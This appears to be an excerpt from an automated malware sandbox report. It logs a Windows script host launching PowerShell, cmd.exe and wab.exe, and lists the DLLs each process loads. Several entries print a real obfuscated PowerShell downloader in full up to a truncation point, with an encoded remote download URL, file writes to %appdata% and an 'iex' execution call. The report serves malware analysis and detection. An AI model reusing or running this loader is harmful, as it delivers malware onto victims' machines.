Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Firtallene = 1;$Aspergilla='Su';$Aspergilla+='bstrin';$Aspergilla+='g';Function Jammerklagen($Trykluftsapparaterne){$Dialogkort223agttagen=$Trykluftsapparaterne.Length-$Firtallene;For($Dialogkort223=5;$Dialogkort223 -lt $Dialogkort223agttagen;$Dialogkort223+=6){$Nettofortjeneste+=$Trykluftsapparaterne.$Aspergilla.Invoke( $Dialogkort223, $Firtallene);}$Nettofortjeneste;}function Nassedes($Bibliografers){. ($Herskabshuset) ($Bibliografers);}$Kirkegange=Jammerklagen 'UltraM atioInd.pz Gasai Ropelafsenl Kon,aStrer/Omsor5Sickl.Alan,0P,raf Walle(HumilWT,ssui Reson .ragdIkke,oSimilwSkrigsStift SkrivNovervTUnor. Har 1Soupi0Beskn.Sekar0Kalve; Mult ,oogaWTierciD.kkenPers 6Hardw4Twal.;Do,im Tonefx Ener6 efri4Abeka;Caboo MerskrUndervEspr.:Finge1preju2Keyse1 Tena.Skaer0Clogg)Nonfo Extr,GPoly,e N.tucMonoskFrounoOhmm /Shor 2Tyr.n0Dott 1Exten0 oder0Lsbla1Wha.v0Ple e1 Spyt At amF Empli.rocerSvedtechirmfDamp.oTribuxBlind/I.aer1Concr2S,ent1Ives.. Selv0Brnea ';$Hydrosalt223=Jammerklagen 'AgronUGarvnsWurtzeUnecorFawni- N,nnA ClumgStepuefloc nLandbtPains ';$Chalybean=Jammerklagen ' Skynhconspt Fla,tEaglepFausssH smo:slutt/under/halv,w NutgwDefinwKat e. Kl bsZarzueLunksnkunstdDrencs EmbipAfgi.aEkspocDe aieHedvi.bankrcVeneroExaggmReint/GuttepLinierpreezo .nde/trylld Penul ,dan/Frig,p nig p OverxAfideoEfterdForfam Pens ';$Microgramming=Jammerklagen ' .ebu> fbr ';$Herskabshuset=Jammerklagen 'FormkiFornye Ti exBank, ';$Nikkelets='Cikorieekstrakters';Nassedes (Jammerklagen 'TilenSRumm eCevittsparr-OversCBuxtooForbinOve ttSubcleCamounCanedtOvere Cardi-Un loPPseudaPr tetForsth Plea .atefT Card:Ty,og\ AdredSer,iiProbam sin.eAchennVasessli uru ,ilamSand,.,upletBackoxFouritAlrun Hyst- TvejV Li.ea flu.lMikr uHypere Asso photo$ PortNTordei,ndavkUdda.kNonfee,ftallT iazeVag,btO.kresSkrab; Abel ');Nassedes (Jammerklagen '.rsteiTerriftetan Waist(Tecovt TesseEkseksForbltpiker-unharp RecaaCalort KashhNysen ,lfacTKombi:Mulci\Moruld,onyaiJubjum Erhve F.lgnKonsts LagnuTubipm Fru,.AlloktVennexMugglt bagf)Ander{,ickeeMeadwx Non.iDisiltPrec }Viren;Tppe, ');$Unsolidifiable = Jammerklagen 'Fluttekar ocWarplhCharmoKoler pocy%AeoniaVogtep VarepSubindBumseaExcomtLae,ea ,erl%catar\ AgamBFaglolTyre,aSlutsnAmninkSp.erofluor. unmoPMariorChannoPhleb Misbe&Julet&sknhe Om,rbe,eisecF.rskhRe.itoBili. A,ce$finko ';Nassedes (Jammerklagen 'Veili$St legDyreblPa,mao ExtrbBestoa telil laa:WhirlLRaabaoSinisr semid SkylskoghewUndstiThickk ookeeB and=,rich(RecascenthumFi tsd gglu Genet/L,mpicUnder Under$PersoUTran,nRedefsFjernoUlderlSchiliU,stedUforniD urofasteristarta Lathb Dupel V,ate Pe,f)Diala ');Nassedes (Jammerklagen 'Fletn$ TerrgBe,zalRed,voMyndeb Att a In.ul Baga: BansMrenovaPastaaPaxilljockee nderrOver.uKontadG rtnsAntiet Ana.yKri.tr Spyt=Fl es$ BndsCStammhChartaSystelOrleayForvrbF leseLystoaCarvynMaxim.OmkrysArc iphipmolbu,eaimacultF ded(Yderk$ExtolMTintyiExtracKerstrTr ns
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Blanko.Pro && echo $"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Firtallene = 1;$Aspergilla='Su';$Aspergilla+='bstrin';$Aspergilla+='g';Function Jammerklagen($Trykluftsapparaterne){$Dialogkort223agttagen=$Trykluftsapparaterne.Length-$Firtallene;For($Dialogkort223=5;$Dialogkort223 -lt $Dialogkort223agttagen;$Dialogkort223+=6){$Nettofortjeneste+=$Trykluftsapparaterne.$Aspergilla.Invoke( $Dialogkort223, $Firtallene);}$Nettofortjeneste;}function Nassedes($Bibliografers){. ($Herskabshuset) ($Bibliografers);}$Kirkegange=Jammerklagen 'UltraM atioInd.pz Gasai Ropelafsenl Kon,aStrer/Omsor5Sickl.Alan,0P,raf Walle(HumilWT,ssui Reson .ragdIkke,oSimilwSkrigsStift SkrivNovervTUnor. Har 1Soupi0Beskn.Sekar0Kalve; Mult ,oogaWTierciD.kkenPers 6Hardw4Twal.;Do,im Tonefx Ener6 efri4Abeka;Caboo MerskrUndervEspr.:Finge1preju2Keyse1 Tena.Skaer0Clogg)Nonfo Extr,GPoly,e N.tucMonoskFrounoOhmm /Shor 2Tyr.n0Dott 1Exten0 oder0Lsbla1Wha.v0Ple e1 Spyt At amF Empli.rocerSvedtechirmfDamp.oTribuxBlind/I.aer1Concr2S,ent1Ives.. Selv0Brnea ';$Hydrosalt223=Jammerklagen 'AgronUGarvnsWurtzeUnecorFawni- N,nnA ClumgStepuefloc nLandbtPains ';$Chalybean=Jammerklagen ' Skynhconspt Fla,tEaglepFausssH smo:slutt/under/halv,w NutgwDefinwKat e. Kl bsZarzueLunksnkunstdDrencs EmbipAfgi.aEkspocDe aieHedvi.bankrcVeneroExaggmReint/GuttepLinierpreezo .nde/trylld Penul ,dan/Frig,p nig p OverxAfideoEfterdForfam Pens ';$Microgramming=Jammerklagen ' .ebu> fbr ';$Herskabshuset=Jammerklagen 'FormkiFornye Ti exBank, ';$Nikkelets='Cikorieekstrakters';Nassedes (Jammerklagen 'TilenSRumm eCevittsparr-OversCBuxtooForbinOve ttSubcleCamounCanedtOvere Cardi-Un loPPseudaPr tetForsth Plea .atefT Card:Ty,og\ AdredSer,iiProbam sin.eAchennVasessli uru ,ilamSand,.,upletBackoxFouritAlrun Hyst- TvejV Li.ea flu.lMikr uHypere Asso photo$ PortNTordei,ndavkUdda.kNonfee,ftallT iazeVag,btO.kresSkrab; Abel ');Nassedes (Jammerklagen '.rsteiTerriftetan Waist(Tecovt TesseEkseksForbltpiker-unharp RecaaCalort KashhNysen ,lfacTKombi:Mulci\Moruld,onyaiJubjum Erhve F.lgnKonsts LagnuTubipm Fru,.AlloktVennexMugglt bagf)Ander{,ickeeMeadwx Non.iDisiltPrec }Viren;Tppe, ');$Unsolidifiable = Jammerklagen 'Fluttekar ocWarplhCharmoKoler pocy%AeoniaVogtep VarepSubindBumseaExcomtLae,ea ,erl%catar\ AgamBFaglolTyre,aSlutsnAmninkSp.erofluor. unmoPMariorChannoPhleb Misbe&Julet&sknhe Om,rbe,eisecF.rskhRe.itoBili. A,ce$finko ';Nassedes (Jammerklagen 'Veili$St legDyreblPa,mao ExtrbBestoa telil laa:WhirlLRaabaoSinisr semid SkylskoghewUndstiThickk ookeeB and=,rich(RecascenthumFi tsd gglu Genet/L,mpicUnder Under$PersoUTran,nRedefsFjernoUlderlSchiliU,stedUforniD urofasteristarta Lathb Dupel V,ate Pe,f)Diala ');Nassedes (Jammerklagen 'Fletn$ TerrgBe,zalRed,voMyndeb Att a In.ul Baga: BansMrenovaPastaaPaxilljockee nderrOver.uKontadG rtnsAntiet Ana.yKri.tr Spyt=Fl es$ BndsCStammhChartaSystelOrleayForvrbF leseLystoaCarvynMaxim.OmkrysArc iphipmolbu,eaimacultF ded(Yderk$ExtolMTintyiExtracKerstrTr ns
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Blanko.Pro && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Firtallene = 1;$Aspergilla='Su';$Aspergilla+='bstrin';$Aspergilla+='g';Function Jammerklagen($Trykluftsapparaterne){$Dialogkort223agttagen=$Trykluftsapparaterne.Length-$Firtallene;For($Dialogkort223=5;$Dialogkort223 -lt $Dialogkort223agttagen;$Dialogkort223+=6){$Nettofortjeneste+=$Trykluftsapparaterne.$Aspergilla.Invoke( $Dialogkort223, $Firtallene);}$Nettofortjeneste;}function Nassedes($Bibliografers){. ($Herskabshuset) ($Bibliografers);}$Kirkegange=Jammerklagen 'UltraM atioInd.pz Gasai Ropelafsenl Kon,aStrer/Omsor5Sickl.Alan,0P,raf Walle(HumilWT,ssui Reson .ragdIkke,oSimilwSkrigsStift SkrivNovervTUnor. Har 1Soupi0Beskn.Sekar0Kalve; Mult ,oogaWTierciD.kkenPers 6Hardw4Twal.;Do,im Tonefx Ener6 efri4Abeka;Caboo MerskrUndervEspr.:Finge1preju2Keyse1 Tena.Skaer0Clogg)Nonfo Extr,GPoly,e N.tucMonoskFrounoOhmm /Shor 2Tyr.n0Dott 1Exten0 oder0Lsbla1Wha.v0Ple e1 Spyt At amF Empli.rocerSvedtechirmfDamp.oTribuxBlind/I.aer1Concr2S,ent1Ives.. Selv0Brnea ';$Hydrosalt223=Jammerklagen 'AgronUGarvnsWurtzeUnecorFawni- N,nnA ClumgStepuefloc nLandbtPains ';$Chalybean=Jammerklagen ' Skynhconspt Fla,tEaglepFausssH smo:slutt/under/halv,w NutgwDefinwKat e. Kl bsZarzueLunksnkunstdDrencs EmbipAfgi.aEkspocDe aieHedvi.bankrcVeneroExaggmReint/GuttepLinierpreezo .nde/trylld Penul ,dan/Frig,p nig p OverxAfideoEfterdForfam Pens ';$Microgramming=Jammerklagen ' .ebu> fbr ';$Herskabshuset=Jammerklagen 'FormkiFornye Ti exBank, ';$Nikkelets='Cikorieekstrakters';Nassedes (Jammerklagen 'TilenSRumm eCevittsparr-OversCBuxtooForbinOve ttSubcleCamounCanedtOvere Cardi-Un loPPseudaPr tetForsth Plea .atefT Card:Ty,og\ AdredSer,iiProbam sin.eAchennVasessli uru ,ilamSand,.,upletBackoxFouritAlrun Hyst- TvejV Li.ea flu.lMikr uHypere Asso photo$ PortNTordei,ndavkUdda.kNonfee,ftallT iazeVag,btO.kresSkrab; Abel ');Nassedes (Jammerklagen '.rsteiTerriftetan Waist(Tecovt TesseEkseksForbltpiker-unharp RecaaCalort KashhNysen ,lfacTKombi:Mulci\Moruld,onyaiJubjum Erhve F.lgnKonsts LagnuTubipm Fru,.AlloktVennexMugglt bagf)Ander{,ickeeMeadwx Non.iDisiltPrec }Viren;Tppe, ');$Unsolidifiable = Jammerklagen 'Fluttekar ocWarplhCharmoKoler pocy%AeoniaVogtep VarepSubindBumseaExcomtLae,ea ,erl%catar\ AgamBFaglolTyre,aSlutsnAmninkSp.erofluor. unmoPMariorChannoPhleb Misbe&Julet&sknhe Om,rbe,eisecF.rskhRe.itoBili. A,ce$finko ';Nassedes (Jammerklagen 'Veili$St legDyreblPa,mao ExtrbBestoa telil laa:WhirlLRaabaoSinisr semid SkylskoghewUndstiThickk ookeeB and=,rich(RecascenthumFi tsd gglu Genet/L,mpicUnder Under$PersoUTran,nRedefsFjernoUlderlSchiliU,stedUforniD urofasteristarta Lathb Dupel V,ate Pe,f)Diala ');Nassedes (Jammerklagen 'Fletn$ TerrgBe,zalRed,voMyndeb Att a In.ul Baga: BansMrenovaPastaaPaxilljockee nderrOver.uKontadG rtnsAntiet Ana.yKri.tr Spyt=Fl es$ BndsCStammhChartaSystelOrleayForvrbF leseLystoaCarvynMaxim.OmkrysArc iphipmolbu,eaimacultF ded(Yderk$ExtolMTintyiExtracKerstrTr ns			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Blanko.Pro && echo $"			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Firtallene = 1;$Aspergilla='Su';$Aspergilla+='bstrin';$Aspergilla+='g';Function Jammerklagen($Trykluftsapparaterne){$Dialogkort223agttagen=$Trykluftsapparaterne.Length-$Firtallene;For($Dialogkort223=5;$Dialogkort223 -lt $Dialogkort223agttagen;$Dialogkort223+=6){$Nettofortjeneste+=$Trykluftsapparaterne.$Aspergilla.Invoke( $Dialogkort223, $Firtallene);}$Nettofortjeneste;}function Nassedes($Bibliografers){. ($Herskabshuset) ($Bibliografers);}$Kirkegange=Jammerklagen 'UltraM atioInd.pz Gasai Ropelafsenl Kon,aStrer/Omsor5Sickl.Alan,0P,raf Walle(HumilWT,ssui Reson .ragdIkke,oSimilwSkrigsStift SkrivNovervTUnor. Har 1Soupi0Beskn.Sekar0Kalve; Mult ,oogaWTierciD.kkenPers 6Hardw4Twal.;Do,im Tonefx Ener6 efri4Abeka;Caboo MerskrUndervEspr.:Finge1preju2Keyse1 Tena.Skaer0Clogg)Nonfo Extr,GPoly,e N.tucMonoskFrounoOhmm /Shor 2Tyr.n0Dott 1Exten0 oder0Lsbla1Wha.v0Ple e1 Spyt At amF Empli.rocerSvedtechirmfDamp.oTribuxBlind/I.aer1Concr2S,ent1Ives.. Selv0Brnea ';$Hydrosalt223=Jammerklagen 'AgronUGarvnsWurtzeUnecorFawni- N,nnA ClumgStepuefloc nLandbtPains ';$Chalybean=Jammerklagen ' Skynhconspt Fla,tEaglepFausssH smo:slutt/under/halv,w NutgwDefinwKat e. Kl bsZarzueLunksnkunstdDrencs EmbipAfgi.aEkspocDe aieHedvi.bankrcVeneroExaggmReint/GuttepLinierpreezo .nde/trylld Penul ,dan/Frig,p nig p OverxAfideoEfterdForfam Pens ';$Microgramming=Jammerklagen ' .ebu> fbr ';$Herskabshuset=Jammerklagen 'FormkiFornye Ti exBank, ';$Nikkelets='Cikorieekstrakters';Nassedes (Jammerklagen 'TilenSRumm eCevittsparr-OversCBuxtooForbinOve ttSubcleCamounCanedtOvere Cardi-Un loPPseudaPr tetForsth Plea .atefT Card:Ty,og\ AdredSer,iiProbam sin.eAchennVasessli uru ,ilamSand,.,upletBackoxFouritAlrun Hyst- TvejV Li.ea flu.lMikr uHypere Asso photo$ PortNTordei,ndavkUdda.kNonfee,ftallT iazeVag,btO.kresSkrab; Abel ');Nassedes (Jammerklagen '.rsteiTerriftetan Waist(Tecovt TesseEkseksForbltpiker-unharp RecaaCalort KashhNysen ,lfacTKombi:Mulci\Moruld,onyaiJubjum Erhve F.lgnKonsts LagnuTubipm Fru,.AlloktVennexMugglt bagf)Ander{,ickeeMeadwx Non.iDisiltPrec }Viren;Tppe, ');$Unsolidifiable = Jammerklagen 'Fluttekar ocWarplhCharmoKoler pocy%AeoniaVogtep VarepSubindBumseaExcomtLae,ea ,erl%catar\ AgamBFaglolTyre,aSlutsnAmninkSp.erofluor. unmoPMariorChannoPhleb Misbe&Julet&sknhe Om,rbe,eisecF.rskhRe.itoBili. A,ce$finko ';Nassedes (Jammerklagen 'Veili$St legDyreblPa,mao ExtrbBestoa telil laa:WhirlLRaabaoSinisr semid SkylskoghewUndstiThickk ookeeB and=,rich(RecascenthumFi tsd gglu Genet/L,mpicUnder Under$PersoUTran,nRedefsFjernoUlderlSchiliU,stedUforniD urofasteristarta Lathb Dupel V,ate Pe,f)Diala ');Nassedes (Jammerklagen 'Fletn$ TerrgBe,zalRed,voMyndeb Att a In.ul Baga: BansMrenovaPastaaPaxilljockee nderrOver.uKontadG rtnsAntiet Ana.yKri.tr Spyt=Fl es$ BndsCStammhChartaSystelOrleayForvrbF leseLystoaCarvynMaxim.OmkrysArc iphipmolbu,eaimacultF ded(Yderk$ExtolMTintyiExtracKerstrTr ns			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Blanko.Pro && echo $"			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll			Jump to behavior
